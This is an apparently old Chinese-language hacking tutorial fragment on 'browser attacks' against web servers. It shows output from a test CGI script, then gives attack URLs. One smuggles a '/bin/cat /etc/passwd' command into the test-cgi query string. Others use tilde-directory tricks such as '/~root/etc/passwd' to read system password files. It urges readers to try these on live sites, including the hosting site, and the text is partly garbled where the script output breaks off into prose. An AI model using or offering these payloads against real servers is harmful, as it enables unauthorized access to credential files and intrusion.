|
浏览器攻击(2) 服务器会应答,本服务器的一些情况如:
CGI/1.0 test script report: argc is 0. argv is . SERVER_SOFTWARE = NCSA/1.4B
SERVER_NAME = thegnome.com
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/1.0
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT = text/plain, application/x-html, application/html,
text/html, text/x-html
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /cgi-bin/test-cgi
QUERY_STRING = whatever
REMOTE_HOST = fifth.column.gov
REMOTE_ADDR = 200.200.200.200
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH = 好吧,让我们来点赶兴趣的
 http://thegnome.com/cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd 3。~的应用
~主要是用在很多的个人主页上的快捷目录的方法,如果我们使用这样的~
http://thegnome.com/~root ;
http://thegnome.com/~root/etc/passwd ;
不是在任何平台上都通过呦,在BSD Apache上曾经成功过,当然还可以试试~bin ,~etc,~uUCp.....
看到这个站点了吗,本站所在的这个站点就是用这种形式的,如果我们打入 本站所在的web地址/~bin
出现了什么,你看到了吗?然后...............注意请不要破坏
|
